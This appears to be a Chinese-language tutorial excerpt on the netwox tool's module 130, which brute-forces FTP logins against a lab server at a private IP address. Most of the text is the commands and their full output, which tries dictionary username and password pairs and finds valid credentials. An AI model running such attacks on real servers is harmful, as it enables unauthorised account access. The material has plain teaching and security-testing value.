netwox 130 -i IP -l user.file -w pass.file
其中,-i 選項指定 FTP 伺服器的 IP 地址;-l 選項指定使用者名稱字典檔案,-w 選項指定密碼字典檔案。[email protected]:~# netwox 130 -i 192.168.59.135 -l user.txt -w password.txt
輸出資訊如下:Trying(thread1) "admin" - "root" Trying(thread2) "admin" - "linux" Trying(thread3) "admin" - "123abc" Trying(thread4) "admin" - "123" Trying(thread5) "root" - "root" Couple(thread1) "admin" - "root" -> bad Trying(thread1) "root" - "linux" Couple(thread2) "admin" - "linux" -> bad Trying(thread2) "root" - "123abc" Couple(thread3) "admin" - "123abc" -> bad Trying(thread3) "root" - "123" Couple(thread4) "admin" - "123" -> bad Trying(thread4) "sm" - "root" Couple(thread5) "root" - "root" -> bad Trying(thread5) "sm" - "linux" Couple(thread3) "root" - "123" -> bad Trying(thread3) "sm" - "123abc" Couple(thread1) "root" - "linux" -> bad Trying(thread1) "sm" - "123" Couple(thread5) "sm" - "linux" -> bad Trying(thread5) "" - "root" Couple(thread2) "root" - "123abc" -> bad Trying(thread2) "" - "linux" Couple(thread4) "sm" - "root" -> bad Trying(thread4) "" - "123abc" Couple(thread1) "sm" - "123" -> good Trying(thread1) "" - "123" Couple(thread2) "" - "linux" -> bad Couple(thread3) "sm" - "123abc" -> bad Couple(thread5) "" - "root" -> bad Couple(thread4) "" - "123abc" -> bad Couple(thread1) "" - "123" -> bad以上輸出資訊顯示了暴力破解的整個過程。它將使用者名稱字典檔案 user.txt 中的每一個使用者名稱與密碼字典檔案 password.txt 中的所有密碼進行配對使用。
[email protected]:~# netwox 130 -i 192.168.59.135 -L sm -w password.txt
輸出資訊如下:Trying(thread1) "sm" - "root" Trying(thread2) "sm" - "linux" Trying(thread3) "sm" - "123abc" Trying(thread4) "sm" - "123" Couple(thread1) "sm" - "root" -> bad Couple(thread2) "sm" - "linux" -> bad Couple(thread3) "sm" - "123abc" -> bad Couple(thread4) "sm" - "123" -> good